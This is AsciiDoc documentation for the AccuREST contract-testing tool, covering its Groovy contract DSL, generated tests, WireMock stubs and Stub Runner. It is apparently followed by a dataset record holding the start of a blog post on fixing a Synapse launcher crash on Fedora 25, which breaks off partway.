# 3. Contract DSL\n\nThe Contract DSL in AccuREST is written in Groovy, but don't be alarmed if you haven't used Groovy before. Knowledge of the language is not really needed, as our DSL uses only a tiny subset of it (namely literals, method calls and closures). What's more, AccuREST's DSL is designed to be programmer-readable without any knowledge of the DSL itself.\n\nLet's look at a full example of a contract definition.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'POST'\n urlPath('\/users') {\n queryParameters {\n parameter 'limit': 100\n parameter 'offset': containing(\"1\")\n parameter 'filter': \"email\"\n }\n }\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n response {\n status 200\n headers {\n header 'Location': '\/users\/john'\n }\n }\n}\n----\n\nNot all features of the DSL are used in the example above. If you didn't find what you are looking for, please check the next paragraphs on this page.\n\n> You can easily compile Accurest Contracts to WireMock stub mappings using the standalone Maven command: `mvn io.codearte.accurest:accurest-maven-plugin:convert`.\n\n## Top-Level Elements\n\nThe following methods can be called in the top-level closure of a contract definition. `request` and `response` are mandatory; `priority` is optional.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n \/\/ Definition of the HTTP request part of the contract\n \/\/ (this can be a valid or invalid request depending\n \/\/ on the type of contract being specified).\n request {\n ...\n }\n\n \/\/ Definition of the HTTP response part of the contract\n \/\/ (a service implementing this contract should respond\n \/\/ with the following response after receiving the request\n \/\/ specified in the \"request\" part above).\n response {\n ...\n }\n\n \/\/ Contract priority, which can be used for overriding\n \/\/ contracts (1 is highest). Priority is optional.\n priority 1\n}\n----\n\n## Request\n\nThe HTTP protocol requires only a **method and address** to be specified in a request. The same information is mandatory in the request definition of an AccuREST contract.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n \/\/ HTTP request method (GET\/POST\/PUT\/DELETE).\n method 'GET'\n\n \/\/ The path component of the request URL is specified as follows.\n urlPath('\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nIt is possible to specify the whole `url` instead of just the path, but `urlPath` is the recommended way as it makes the tests **host-independent**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'GET'\n\n \/\/ Specifying `url` and `urlPath` in one contract is illegal.\n url('http:\/\/localhost:8888\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nA request may contain **query parameters**, which are specified in a closure nested in a call to `urlPath` or `url`.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n urlPath('\/users') {\n\n \/\/ Each parameter is specified in the form\n \/\/ `'paramName' : paramValue` where the parameter value\n \/\/ may be a simple literal or one of the matcher functions,\n \/\/ all of which are used in this example.\n queryParameters {\n\n \/\/ If a simple literal is used as the value,\n \/\/ the default matcher function is used (equalTo).\n parameter 'limit': 100\n\n \/\/ The `equalTo` function simply compares the passed value\n \/\/ using the identity operator (==).\n parameter 'filter': equalTo(\"email\")\n\n \/\/ The `containing` function matches strings\n \/\/ that contain the passed substring.\n parameter 'gender': containing(\"[mf]\")\n\n \/\/ The `matching` function tests the parameter\n \/\/ against the passed regular expression.\n parameter 'offset': matching(\"[0-9]+\")\n\n \/\/ The `notMatching` function tests that the parameter\n \/\/ does not match the passed regular expression.\n parameter 'loginStartsWith': notMatching(\".{0,2}\")\n }\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\nThe request may contain additional **request headers**...\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ Each header is added in the form `'Header-Name' : 'Header-Value'`.\n headers {\n header 'Content-Type': 'application\/json'\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\n...and a **request body**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ JSON and XML formats of the request body are supported.\n \/\/ The format will be determined from a header or the body's content.\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n\n response {\n ...\n }\n}\n----\n\nThe **body's format** can also be specified explicitly by invoking one of the format functions.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ In this case the body will be formatted as XML.\n body equalToXml(\n '''<user><login>john<\/login><name>John The Contract<\/name><\/user>'''\n )\n }\n\n response {\n ...\n }\n}\n----\n\n## Response\n\nA minimal response must contain an **HTTP status code**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n }\n response {\n \/\/ Status code sent by the server\n \/\/ in response to the request specified above.\n status 200\n }\n}\n----\n\nBesides the status, a response may contain **headers** and a **body**, which are specified the same way as in the request (see the previous paragraph).
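\n\nFor instance, a response carrying both might look like the following sketch (it reuses only DSL elements already shown above):\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n }\n response {\n status 200\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''{ \"login\" : \"john\" }'''\n }\n}\n----\n\n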
## Regular expressions\nYou can use regular expressions to write your requests in the Contract DSL. This is particularly useful when you want to indicate that a given response should be provided for requests that follow a given pattern. You can also use regular expressions when you need to use patterns rather than exact values both for your tests and for your server-side tests.\n\nPlease see the example below:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl groovyDsl = GroovyDsl.make {\n request {\n method('GET')\n url $(client(~\/\\\/[0-9]{2}\/), server('\/12'))\n }\n response {\n status 200\n body(\n id: value(\n client('123'),\n server(regex('[0-9]+'))\n ),\n surname: $(\n client('Kowalsky'),\n server('Lewandowski')\n ),\n name: 'Jan',\n created: $(client('2014-02-02 12:23:43'), server({ currentDate(it) })),\n correlationId: value(client('5d1f9fef-e0dc-4f3d-a7e4-72d2220dd827'),\n server(regex('[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}'))\n )\n )\n headers {\n header 'Content-Type': 'text\/plain'\n }\n }\n}\n----\n\n## Passing optional parameters\n\nIt is possible to provide optional parameters in your contract. It is only possible to have optional parameters for:\n\n- the __STUB__ side of the Request\n- the __TEST__ side of the Response\n\nExample:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n priority 1\n request {\n method 'POST'\n url '\/users\/password'\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n email: $(stub(optional(regex(email()))), test('abc@abc.com')),\n callback_url: $(stub(regex(hostname())), test('http:\/\/partners.com'))\n )\n }\n response {\n status 404\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n code: value(stub(\"123123\"), test(optional(\"123123\"))),\n message: \"User not found by email = [${value(test(regex(email())), stub('not.existing@user.com'))}]\"\n )\n }\n}\n----\n\nBy wrapping a part of the body with the `optional()` method you are in fact creating a regular expression that matches the wrapped pattern zero or one time (see the trailing `?` in the generated patterns below).\n\nThat way for the example above the following test would be generated:\n\n[source,groovy,indent=0]\n----\n given:\n def request = given()\n .header('Content-Type', 'application\/json')\n .body('{\"email\":\"abc@abc.com\",\"callback_url\":\"http:\/\/partners.com\"}')\n\n when:\n def response = given().spec(request)\n .post(\"\/users\/password\")\n\n then:\n response.statusCode == 404\n response.header('Content-Type') == 'application\/json'\n and:\n DocumentContext parsedJson = JsonPath.parse(response.body.asString())\n !parsedJson.read('''$[?(@.code =~ \/(123123)?\/)]''', JSONArray).empty\n !parsedJson.read('''$[?(@.message =~ \/User not found by email = \\\\[[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4}\\\\]\/)]''', JSONArray).empty\n\n----\n\nand the following stub:\n\n[source,javascript,indent=0]\n----\n{\n \"request\" : {\n \"url\" : \"\/users\/password\",\n \"method\" : \"POST\",\n \"bodyPatterns\" : [ {\n \"matchesJsonPath\" : \"$[?(@.callback_url =~ \/((http[s]?|ftp):\\\\\/)\\\\\/?([^:\\\\\/\\\\s]+)(:[0-9]{1,5})?\/)]\"\n }, {\n \"matchesJsonPath\" : \"$[?(@.email =~ \/([a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4})?\/)]\"\n } ],\n \"headers\" : {\n \"Content-Type\" : {\n \"equalTo\" : \"application\/json\"\n }\n }\n },\n \"response\" : {\n \"status\" : 404,\n \"body\" : \"{\\\"code\\\":\\\"123123\\\",\\\"message\\\":\\\"User not found by email = [not.existing@user.com]\\\"}\",\n \"headers\" : {\n \"Content-Type\" : \"application\/json\"\n }\n },\n \"priority\" : 1\n}\n----
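\n\nTo make the mechanics concrete, here is a rough Groovy illustration (not generated code) of how such an optional pattern behaves:\n\n[source,groovy,indent=0]\n----\n\/\/ optional(...) effectively wraps the expression in a group with a `?`\n\/\/ quantifier, like the `(123123)?` pattern in the generated test above\nassert '123123' ==~ \/(123123)?\/\nassert '' ==~ \/(123123)?\/\n----\n\n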
## Executing custom methods on server side\nIt is also possible to define a method call to be executed on the server side during the test. Such a method can be added to the class defined as \"baseClassForTests\" in the configuration. Please see the examples below:\n\n### Groovy DSL\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'PUT'\n url $(client(regex('^\/api\/[0-9]{2}$')), server('\/api\/12'))\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''\\\n [{\n \"text\": \"Gonna see you at Warsaw\"\n }]\n'''\n }\n response {\n body (\n path: $(client('\/api\/12'), server(regex('^\/api\/[0-9]{2}$'))),\n correlationId: $(client('1223456'), server(execute('isProperCorrelationId($it)')))\n )\n status 200\n }\n}\n----\n\n### Base Mock Spec\n\n[source,groovy,indent=0]\n----\nabstract class BaseMockMvcSpec extends Specification {\n\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new PairIdController())\n }\n\n void isProperCorrelationId(Integer correlationId) {\n assert correlationId == 123456\n }\n}\n----\n\n## JAX-RS support\nStarting with release 0.8.0 we support the JAX-RS 2 Client API. The base class needs to define a `protected WebTarget webTarget` field and handle server initialization; right now the only option to test a JAX-RS API is to start a web server.\n\nA request with a body needs to have a content type set, otherwise `application\/octet-stream` is going to be used.\n\nIn order to use the JAX-RS mode, use the following settings:\n\n[source,groovy,indent=0]\n----\ntestMode = 'JAXRSCLIENT'\n----\n\nAn example of a generated test API:\n\n[source,groovy,indent=0]\n----\nclass FraudDetectionServiceSpec extends MvcSpec {\n\n\tdef shouldMarkClientAsNotFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":123.123}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus == \"OK\"\n\t\t\tassertThatRejectionReasonIsNull(responseBody.rejectionReason)\n\t}\n\n\tdef shouldMarkClientAsFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":99999}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus ==~ java.util.regex.Pattern.compile('[A-Z]{5}')\n\t\t\tresponseBody.rejectionReason == \"Amount too high\"\n\t}\n\n}\n----
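\n\nA minimal sketch of a matching base class is shown below. Only the `ClientBuilder` API is standard JAX-RS 2; the `startServer()` helper that boots the tested application and returns its base URI is hypothetical and depends on your stack:\n\n[source,groovy,indent=0]\n----\nimport javax.ws.rs.client.ClientBuilder\nimport javax.ws.rs.client.WebTarget\nimport spock.lang.Specification\n\nabstract class MvcSpec extends Specification {\n\n\tprotected WebTarget webTarget\n\n\tdef setup() {\n\t\t\/\/ startServer() is a hypothetical helper that starts the web server\n\t\t\/\/ hosting the tested JAX-RS application and returns its base URI\n\t\twebTarget = ClientBuilder.newClient().target(startServer())\n\t}\n\n\t\/\/ implemented by concrete specs or a project-specific helper\n\tabstract URI startServer()\n}\n----\n\n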
# 4. Client Side\n\nDuring the tests you want to have a WireMock instance up and running that simulates the service Y.\nYou would like to feed that instance with a proper stub definition. That stub definition would need\nto be valid from WireMock's perspective but should also be reusable on the server side.\n\n__Summing it up:__ On this side, in the stub definition, you can use patterns for request stubbing and you need exact\nvalues for responses.\n\n# 5. Server Side\n\nAs service Y, since you are developing the stub, you need to be sure that it actually resembles your\nconcrete implementation. You can't have a situation where your stub acts in one way and your application in\nproduction behaves in a different way.\n\nThat's why acceptance tests will be generated from the provided stub, ensuring\nthat your application behaves in the same way as you define in your stub.\n\n__Summing it up:__ On this side, in the stub definition, you need exact values in the request and can use patterns\/methods\nfor response verification.\n\n# 6. Examples\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'PUT'\n url '\/api\/12'\n headers {\n header 'Content-Type': 'application\/vnd.com.ofg.twitter-places-analyzer.v1+json'\n }\n body '''\\\n [{\n \"created_at\": \"Sat Jul 26 09:38:57 +0000 2014\",\n \"id\": 492967299297845248,\n \"id_str\": \"492967299297845248\",\n \"text\": \"Gonna see you at Warsaw\",\n \"place\":\n {\n \"attributes\":{},\n \"bounding_box\":\n {\n \"coordinates\":\n [[\n [-77.119759,38.791645],\n [-76.909393,38.791645],\n [-76.909393,38.995548],\n [-77.119759,38.995548]\n ]],\n \"type\":\"Polygon\"\n },\n \"country\":\"United States\",\n \"country_code\":\"US\",\n \"full_name\":\"Washington, DC\",\n \"id\":\"01fbe706f872cb32\",\n \"name\":\"Washington\",\n \"place_type\":\"city\",\n \"url\": \"http:\/\/api.twitter.com\/1\/geo\/id\/01fbe706f872cb32.json\"\n }\n }]\n'''\n }\n response {\n status 200\n }\n}\n----\n\n# 7. Scenarios\n\nIt's possible to handle scenarios with Accurest. All you need to do is stick to a proper naming convention while creating your contracts. The convention requires including an order number followed by an underscore.\n\n[source,indent=0]\n----\nmy_contracts_dir\\\n scenario1\\\n 1_login.groovy\n 2_showCart.groovy\n 3_logout.groovy\n----\n\nSuch a tree will cause Accurest to generate a WireMock scenario with the name `scenario1` and three steps:\n - login marked as `Started` pointing to:\n - showCart marked as `Step1` pointing to:\n - logout marked as `Step2` which will close the scenario.\nMore details about WireMock scenarios can be found under [http:\/\/wiremock.org\/stateful-behaviour.html](http:\/\/wiremock.org\/stateful-behaviour.html)\n\nAccurest will also generate tests with a guaranteed order of execution.\n\n# 8. Stub Runner\n\nOne of the issues that you could have encountered while using AccuREST was passing the generated WireMock JSON stubs from the server side to the client side (or to various clients). Copying the JSON files manually is out of the question.\n\nIn this article you'll see how to prepare your project to start publishing stubs as JARs and how to use Stub Runner in your tests to run WireMock servers and feed them with stub definitions.\n\n## Publishing stubs as JARs\n\nThe easiest approach would be to centralize the way stubs are kept. 
For example you can keep them as JARs in a Maven repository.\n\n### Gradle\n\nExample of AccuREST Gradle setup:\n\n[source,groovy,indent=0]\n----\n\tapply plugin: 'maven-publish'\n\n\text {\n\t\twiremockStubsOutputDirRoot = file(\"${project.buildDir}\/production\/${project.name}-stubs\/\")\n\t\twiremockStubsOutputDir = new File(wiremockStubsOutputDirRoot)\n\t}\n\n\taccurest {\n\t\ttargetFramework = 'Spock'\n\t\ttestMode = 'MockMvc'\n\t\tbaseClassForTests = 'com.toomuchcoding.MvcSpec'\n\t\tcontractsDslDir = file(\"${project.projectDir.absolutePath}\/mappings\/\")\n\t\tgeneratedTestSourcesDir = file(\"${project.buildDir}\/generated-sources\/\")\n\t\tstubsOutputDir = wiremockStubsOutputDir\n\t}\n\n\ttask stubsJar(type: Jar, dependsOn: [\"generateWireMockClientStubs\"]) {\n\t baseName = \"${project.name}-stubs\"\n\t from wiremockStubsOutputDirRoot\n\t}\n\n\tartifacts {\n\t archives stubsJar\n\t}\n\n\tpublishing {\n\t publications {\n\t stubs(MavenPublication) {\n\t artifactId \"${project.name}-stubs\"\n\t artifact stubsJar\n\t }\n\t }\n\t}\n----\n\n### Maven\n\nExample of Maven can be found in the [AccuREST Maven Plugin README](https:\/\/github.com\/Codearte\/accurest-maven-plugin\/#publishing-wiremock-stubs-projectf-stubsjar)\n\n## Using Stub Runner to automate running stubs\n\nStub Runner automates downloading stubs from a Maven repository (that includes also the local Maven repository) and starting the WireMock server for each of those stubs.\n\n### Modules\n\nAccuREST comes with a new structure of modules\n\n[source,indent=0]\n----\n\u2514\u2500\u2500 stub-runner\n \u251c\u2500\u2500 stub-runner\n \u251c\u2500\u2500 stub-runner-junit\n \u251c\u2500\u2500 stub-runner-spring\n \u2514\u2500\u2500 stub-runner-spring-cloud\n----\n\n#### Stub Runner\n\nContains core logic of Stub Runner. Gives you a main class to run Stub Runner from the command line or from Gradle.\n\nHere you can see a list of options with which you can run Stub Runner:\n\n[source,indent=0]\n----\njava -jar stub-runner.jar [options...]\n -maxp (--maxPort) N : Maximum port value to be assigned to the\n Wiremock instance. Defaults to 15000\n (default: 15000)\n -minp (--minPort) N : Minimal port value to be assigned to the\n Wiremock instance. Defaults to 10000\n (default: 10000)\n -s (--stubs) VAL : Comma separated list of Ivy representation of\n jars with stubs. Eg. groupid:artifactid1,group\n id2:artifactid2:classifier\n -sr (--stubRepositoryRoot) VAL : Location of a Jar containing server where you\n keep your stubs (e.g. http:\/\/nexus.net\/content\n \/repositories\/repository)\n -ss (--stubsSuffix) VAL : Suffix for the jar containing stubs (e.g.\n 'stubs' if the stub jar would have a 'stubs'\n classifier for stubs: foobar-stubs ).\n Defaults to 'stubs' (default: stubs)\n -wo (--workOffline) : Switch to work offline. 
Defaults to 'false'\n (default: false)\n----\n\nYou can produce a fat jar and run the app as presented above.\n\nYou can also configure the stub runner by either passing the full arguments list with `-Pargs`, like this:\n\n`.\/gradlew stub-runner-root:stub-runner:run -Pargs=\"-c pl -minp 10000 -maxp 10005 -s a:b:c,d:e,f:g:h\"`\n\nor passing each parameter separately with a `-P` prefix and without the hyphen (-) in the parameter name:\n\n`.\/gradlew stub-runner-root:stub-runner:run -Pc=pl -Pminp=10000 -Pmaxp=10005 -Ps=a:b:c,d:e,f:g:h`\n\n#### Stub Runner JUnit Rule\n\nStub Runner comes with a JUnit rule thanks to which you can very easily download and run stubs for a given group and artifact ID:\n\n[source,java,indent=0]\n----\n@ClassRule public static AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot(\"http:\/\/your.repo.com\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\")\n\t\t\t.downloadStub(\"io.codearte:stub1\", \"io.codearte:stub2:classifier\", \"io.codearte:stub3\");\n----\n\nAfter that rule is executed, Stub Runner connects to your Maven repository and, for the given list of dependencies, tries to:\n* download them\n* cache them locally\n* unzip them to a temporary folder\n* start a WireMock server for each Maven dependency on a random port from the provided range of ports\n* feed the WireMock server with all JSON files that are valid WireMock definitions\n\nStub Runner uses the [Groovy Grape](http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/grape.html) mechanism to download the Maven dependencies. Check the [docs](http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/grape.html) for more information.\n\nSince `AccurestRule` implements the `StubFinder` interface, it allows you to find the started stubs:\n\n[source,groovy,indent=0]\n----\ninterface StubFinder {\n\t\/**\n\t * For the given groupId and artifactId tries to find the matching\n\t * URL of the running stub.\n\t *\n\t * @param groupId - might be null. In that case a search only via artifactId takes place\n\t * @return URL of a running stub or null if not found\n\t *\/\n\tURL findStubUrl(String groupId, String artifactId)\n\n\t\/**\n\t * For the given Ivy notation {@code groupId:artifactId} tries to find the matching\n\t * URL of the running stub.
You can also pass only {@code artifactId}.\n\t *\n\t * @param ivyNotation - Ivy representation of the Maven artifact\n\t * @return URL of a running stub or null if not found\n\t *\/\n\tURL findStubUrl(String ivyNotation)\n\n\t\/**\n\t * Returns all running stubs\n\t *\/\n\tRunningStubs findAllRunningStubs()\n}\n----\n\nExample of usage in Spock tests:\n\n[source,groovy,indent=0]\n----\n@ClassRule @Shared AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot('http:\/\/your.repo.com')\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\")\n\n\tdef 'should start WireMock servers'() {\n\t\texpect: 'WireMocks are running'\n\t\t\trule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null\n\t\t\trule.findStubUrl('loanIssuance') != null\n\t\t\trule.findStubUrl('loanIssuance') == rule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')\n\t\t\trule.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null\n\t\tand:\n\t\t\trule.findAllRunningStubs().isPresent('loanIssuance')\n\t\t\trule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')\n\t\t\trule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')\n\t\tand: 'Stubs were registered'\n\t\t\t\"${rule.findStubUrl('loanIssuance').toString()}\/name\".toURL().text == 'loanIssuance'\n\t\t\t\"${rule.findStubUrl('fraudDetectionServer').toString()}\/name\".toURL().text == 'fraudDetectionServer'\n\t}\n----\n\nExample of usage in JUnit tests:\n\n[source,java,indent=0]\n----\n@ClassRule public static AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot(\"http:\/\/your.repo.com\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\");\n\n\t@Test\n\tpublic void should_start_wiremock_servers() throws Exception {\n\t\t\/\/ expect: 'WireMocks are running'\n\t\t\tthen(rule.findStubUrl(\"io.codearte.accurest.stubs\", \"loanIssuance\")).isNotNull();\n\t\t\tthen(rule.findStubUrl(\"loanIssuance\")).isNotNull();\n\t\t\tthen(rule.findStubUrl(\"loanIssuance\")).isEqualTo(rule.findStubUrl(\"io.codearte.accurest.stubs\", \"loanIssuance\"));\n\t\t\tthen(rule.findStubUrl(\"io.codearte.accurest.stubs:fraudDetectionServer\")).isNotNull();\n\t\t\/\/ and:\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"loanIssuance\")).isTrue();\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"io.codearte.accurest.stubs\", \"fraudDetectionServer\")).isTrue();\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"io.codearte.accurest.stubs:fraudDetectionServer\")).isTrue();\n\t\t\/\/ and: 'Stubs were registered'\n\t\t\tthen(httpGet(rule.findStubUrl(\"loanIssuance\").toString() + \"\/name\")).isEqualTo(\"loanIssuance\");\n\t\t\tthen(httpGet(rule.findStubUrl(\"fraudDetectionServer\").toString() + \"\/name\")).isEqualTo(\"fraudDetectionServer\");\n\t}\n----\n\nCheck the *Common properties for JUnit and Spring* for more information on how to apply global configuration of Stub Runner.\n\n#### Stub Runner Spring\n\nIf you're using Spring then you can just import the `io.codearte.accurest.stubrunner.spring.StubRunnerConfiguration` and a bean of type `StubFinder` will get registered.\n\nIn order to find a URL and port of a given dependency you can autowire the bean in your test and call its methods:\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(classes = Config, loader = SpringApplicationContextLoader)\nclass 
StubRunnerConfigurationSpec extends Specification {\n\n\t@Autowired StubFinder stubFinder\n\n\tdef 'should start WireMock servers'() {\n\t\texpect: 'WireMocks are running'\n\t\t\tstubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null\n\t\t\tstubFinder.findStubUrl('loanIssuance') != null\n\t\t\tstubFinder.findStubUrl('loanIssuance') == stubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')\n\t\t\tstubFinder.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null\n\t\tand:\n\t\t\tstubFinder.findAllRunningStubs().isPresent('loanIssuance')\n\t\t\tstubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')\n\t\t\tstubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')\n\t\tand: 'Stubs were registered'\n\t\t\t\"${stubFinder.findStubUrl('loanIssuance').toString()}\/name\".toURL().text == 'loanIssuance'\n\t\t\t\"${stubFinder.findStubUrl('fraudDetectionServer').toString()}\/name\".toURL().text == 'fraudDetectionServer'\n\t}\n\n\t@Configuration\n\t@Import(StubRunnerConfiguration)\n\t@EnableAutoConfiguration\n\tstatic class Config {}\n}\n----\n\nCheck the *Common properties for JUnit and Spring* section for more information on how to apply global configuration of Stub Runner.\n\n#### Stub Runner Spring Cloud\n\nIf you're using Spring Cloud, it's enough to add `stub-runner-spring-cloud` to the classpath and a bean of type `StubFinder` will get registered automatically.\n\n#### Common properties for JUnit and Spring\n\nSome of the properties that are repetitive can be set using system properties or property sources (for Spring). Here are their names with their default values:\n\n[width=\"60%\",frame=\"topbot\",options=\"header\"]\n|======================\n| Property name | Default value | Description\n|stubrunner.port.range.min|10000| Minimal value of a port for a started WireMock with stubs\n|stubrunner.port.range.max|15000| Maximum value of a port for a started WireMock with stubs\n|stubrunner.stubs.repository.root|| Maven repo URL. If blank, the local Maven repo will be used\n|stubrunner.stubs.classifier|stubs| Default classifier for the stub artifacts\n|stubrunner.work-offline|false| If true, no remote repositories will be contacted to download stubs\n|stubrunner.stubs|| Comma separated list of Ivy notations of stubs to download\n|======================
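\n\nFor example, all your tests could be pointed at a different repository and port range via JVM system properties. The values below are purely illustrative, and depending on how your build forks the test JVM you may need to pass the properties through to it explicitly:\n\n[source,indent=0]\n----\nmvn test -Dstubrunner.stubs.repository.root=http:\/\/your.repo.com -Dstubrunner.port.range.min=12000 -Dstubrunner.port.range.max=12500\n----\n\n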
# 9. Migration Guide\n\n# Migration to 0.4.7\n- In 0.4.7 we fixed the package name (coderate to codearte), so you have to do the same in your projects. This means replacing ```io.coderate.accurest.dsl.GroovyDsl``` with ```io.codearte.accurest.dsl.GroovyDsl```\n\n# Migration to 1.0.0-RC1\n- from 1.0.0 we distinguish ignored contracts from excluded contracts:\n - the `excludedFiles` pattern tells Accurest to skip processing those files at all\n - the `ignoredFiles` pattern tells Accurest to generate contracts and tests, but the tests will be marked as `@Ignore`\n\n- from 1.0.0 the `basePackageForTests` behaviour has changed\n - prior to the change all DSL files had to be under `contractsDslDir`\/`basePackageForTests`\/*subpackage*, resulting in `basePackageForTests`.*subpackage* test package creation\n - now all DSL files have to be under `contractsDslDir`\/*subpackage*, resulting in `basePackageForTests`.*subpackage* test package creation\n - if you don't migrate to the new approach you will have your tests under `contractsDslDir`.`contractsDslDir`.*subpackage*","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"d63a441fddd6b87e8cef8c880d209256d9514cc3","subject":"Update 2017-01-10-Fedora25-Synapse-and-Your-Display-Server.adoc","message":"Update 2017-01-10-Fedora25-Synapse-and-Your-Display-Server.adoc","repos":"iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io","old_file":"_posts\/2017-01-10-Fedora25-Synapse-and-Your-Display-Server.adoc","new_file":"_posts\/2017-01-10-Fedora25-Synapse-and-Your-Display-Server.adoc","new_contents":"= Fedora25: Synapse and Your Display Server\n:hp-tags: fedora, linux, synapse, launcher, solution, terminal, display, wayland, Xorg\n\n## The Problem\n\nOne of the tools I've constantly used when on a Linux distribution is https:\/\/launchpad.net\/synapse-project[Synapse]. It's a really fast application launcher. I've tried https:\/\/github.com\/ManuelSchneid3r\/albert[albert] and others but none have pleased me as much. Since I switched to Fedora25 back in December 2016, I've been using GNOME's built-in search, which resides in the dashboard. It suffices, but the rendering required can cause it to be a bit laggy when resources are being hogged (especially by Chrome \ud83d\ude22). So I decided to install Synapse. Unfortunately, after installing, it wouldn't launch from the application menu. I opened Terminix and typed `synapse` only to see it crash from a segmentation fault \ud83e\udd10. I decided to Google search the issue and came across these links:\n\n- https:\/\/ask.fedoraproject.org\/en\/question\/98598\/i-get-a-segmentation-fault-when-starting-synapse-on-fedora-25-what-to-do\/\n- https:\/\/www.reddit.com\/r\/Fedora\/comments\/5j31sd\/synapse_on_fedora_25_fails_with_segmentation\/\n- https:\/\/bugs.launchpad.net\/synapse-project\/+bug\/1592008\n\nUnfortunately everyone was complaining, but no solution.\n\n## The Solution\n\nI figured it was synapse trying to access memory or a stream that doesn't exist. So I checked `synapse -h` to see what options are available. One of the options available is `--display`. You can get synapse to start successfully with the following steps.\n\n 1. Check the location of the displays you have available: `cd \/tmp\/.X11-unix && for x in X*; do echo \":${x#X}\"; done`\n 2. Then, from the locations listed, try using any of them as arguments to the `--display` option.\n\nFor me, `synapse --display=:0` worked just fine.\n\n**NB: This allows you to manually launch synapse. However, you MAY want to ensure that:**\n\n 1. 
